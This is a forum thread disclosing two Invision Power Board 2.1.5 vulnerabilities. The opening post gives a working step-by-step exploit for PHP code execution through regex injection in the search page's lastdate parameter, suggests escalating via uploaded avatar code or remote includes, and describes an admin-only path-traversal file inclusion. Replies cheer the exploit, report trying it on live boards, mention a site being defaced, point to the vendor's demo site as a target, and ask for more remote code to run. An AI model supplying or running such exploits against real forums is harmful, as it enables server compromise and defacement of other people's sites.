14 replies to this topic

[kuza55]

Several Invision Flaws (2.1.5 and possibly earlier)
---------------------------------------------------
IceShaman & Wells
HackThisSite.org


1) Code execution

sources/action_public/search.php line 1261
$this->output = preg_replace( "#(value=[\"']{$this->ipsclass->input['lastdate']}[\"'])#i", "\\1 selected='selected'",
$this->output );

The input string is not properly sanitized which can lead to arbitrary code execution.
Example exploit:

- Post in a forum with "eval(die()); //" somewhere in the body of the post
- Use the search form to find text die just by your username (so only one result shows)
make sure "Show results as posts" is selected.
- Append to the URL at the top &lastdate=z|eval.*?%20//)%23e%00 and press return
- The code should have been executed

The lastdate string alters the regex to accept anything inside eval() and parse it as code, as
an #e modifier is added and then %00 used which will be parsed as a null byte and truncate
the string thus removing the original )#i part.

Due to selected='selected' also being executed as php code a space and // has to be used to turn
the text into a comment so it will be ignored by PHP.

As you can see this is just the beginning. You can upload an avatar with php code somewhere in it
and changed the above example to include() it thus running as much PHP code as you like. On default
PHP setups you can also include() remote files.


2) Remote file inclusion (requires admin)

sources/action_admin/paysubscriptions.php line 282
$gateway = trim( $this->ipsclass->input['name'] );

The input string is not properly sanitized and can be used to transverse directories in
this later include on line 307:
require_once( ROOT_PATH . 'sources/classes/paymentgateways/class_gw_'.$gateway.'.php' );

This code may look safe as the prefix to the file is hardcoded, unfortunately the backspace
character may be used to remove this prefix thus allowing ../../ combinations to execute code
from any file ending in .php.

Example: [url="http://host/admin.php?adsess=...§ion=content&act=msubs&code=install-gateway&name="]http://www.host.com/index.php?act=task&ck='[/url]

Although this is limited to 32 characters, it still may pose a risk in certain circumstances.


Flaws researched by IceShaman and Wells
Flaw #1 was first discovered by "securicore" security group and used to exploit my forums. This led
to me doing a quick audit of the code to find it (it goes without saying that I succeeded).


- IceShaman

[Trinitron]

Wow, nice find, I had some fun with this a moment ago. I'm going to test running some other commands than die() next time

[Tyler]

hope GSO is patched!

[SnXster]

I just tried the sql injection on my 2.0.4 board and it works fine!

[kuza55]

hope GSO is patched!

So do I considering someone already tried to run the exploit today, :S, and I'm fairly sure its a simple patch, filtering out # signs would have fixed it, or if we actually knew what (and how) the variable was used you could probably just filter it properly....my guess would be that it has to be an integer, so just running it through intval() should have been enough, but ah well...

Has anyone tested the second flaw succesfuly, because I haven't been able to get any characters deleted by using the backspace char (on my own test script, so it may work on IPB or some random PHP installs or something).....

[Logan]

I've also been testing the vulnerability locally, and I'm not getting any success. I haven't been able to execute any code, nor inject anything through the task exploit.

[thotho]

hope GSO is patched!

it wasn't

http://zone-h.org/en...ror/id=3679327/

[Blake]

OK you got us, for the lat 3 years we have made it unscathed, and yes this time we faultered. No harm done, and everything was back likety split.

Damn I can't even see what they wrote zone-h is down

[setthesun]

This vulnerability is really good find, First I never think about backspace char in a similiar situations (very interesting just like null chars).

And secondly regex exploit is very good job, I want congrats guys who found security flaws from hackthissite.

About hacking GSO, I think they were waiting for this day

[Blake]

OOOOOOOOO we actualy got a special defacement tag. I feel honored!

[crock]

I was already like WTF?? when i tried to access the site this morning and got a htaxx question. lol, no legal box to try this on tho

you can test it on the official IPB demo site ,
resets every hour

[thotho]

forgotten!!

[darkbluefirefly]

any good remote codes to excute? or a link to learn these remote codes? THanks lol, i wanna try ha.

[cyb3rpr3dat0r]

IPB has very awesome GUI anyways Thanks for Exploit !